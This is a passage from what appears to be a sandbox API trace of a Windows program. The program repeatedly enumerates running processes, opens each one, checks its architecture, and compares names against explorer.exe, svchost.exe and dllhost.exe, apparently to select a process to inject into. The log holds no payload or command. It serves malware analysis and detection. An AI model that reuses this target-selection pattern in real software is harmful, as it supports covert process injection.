lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0248.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0248.078] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0248.079] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0248.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0248.079] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0248.079] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.080] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.080] CloseHandle (hObject=0xec) returned 1 [0248.080] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0248.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0248.080] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.080] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.080] CloseHandle (hObject=0xec) returned 1 [0248.080] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0248.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0248.081] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0248.081] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.081] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.081] CloseHandle (hObject=0xec) returned 1 [0248.081] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0248.081] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0248.082] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.082] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.082] CloseHandle (hObject=0xec) returned 1 [0248.082] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.082] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0248.083] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.083] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.083] CloseHandle (hObject=0xec) returned 1 [0248.083] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0248.084] CloseHandle (hObject=0xe8) returned 1 [0248.084] Sleep (dwMilliseconds=0x3e8) [0249.102] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0249.104] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0249.104] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0249.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0249.105] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0249.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0249.105] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0249.106] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0249.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0249.106] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0249.107] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0249.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0249.107] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0249.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0249.108] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0249.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0249.108] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0249.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0249.109] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0249.109] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0249.110] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0249.110] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0249.111] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0249.111] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0249.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0249.112] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0249.112] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0249.113] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0249.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0249.113] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.113] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.114] CloseHandle (hObject=0xec) returned 1 [0249.114] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0249.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0249.114] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0249.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0249.115] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.115] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.115] CloseHandle (hObject=0xec) returned 1 [0249.115] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0249.115] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0249.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0249.116] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0249.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0249.116] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.116] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.116] CloseHandle (hObject=0xec) returned 1 [0249.116] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0249.116] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0249.116] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0249.116] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0249.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0249.117] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.117] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.117] CloseHandle (hObject=0xec) returned 1 [0249.117] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0249.117] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0249.117] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0249.117] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0249.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0249.118] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.118] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.118] CloseHandle (hObject=0xec) returned 1 [0249.118] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0249.118] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0249.118] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0249.118] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0249.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0249.118] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.118] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.118] CloseHandle (hObject=0xec) returned 1 [0249.118] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0249.118] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0249.118] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0249.118] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0249.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0249.119] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.119] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.119] CloseHandle (hObject=0xec) returned 1 [0249.119] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0249.119] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0249.119] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0249.119] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0249.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0249.120] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.120] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.120] CloseHandle (hObject=0xec) returned 1 [0249.120] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0249.120] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0249.120] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0249.120] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0249.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0249.120] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.120] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.120] CloseHandle (hObject=0xec) returned 1 [0249.120] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0249.120] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0249.120] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0249.120] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0249.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0249.121] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.121] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.121] CloseHandle (hObject=0xec) returned 1 [0249.121] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0249.121] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0249.121] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0249.121] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0249.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0249.122] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.122] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.122] CloseHandle (hObject=0xec) returned 1 [0249.122] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0249.122] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0249.122] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0249.122] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0249.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0249.122] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.122] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.122] CloseHandle (hObject=0xec) returned 1 [0249.122] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0249.122] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0249.122] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0249.122] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0249.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0249.123] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.123] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.123] CloseHandle (hObject=0xec) returned 1 [0249.123] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0249.123] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0249.123] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0249.123] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0249.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0249.124] IsWow64Process (in: 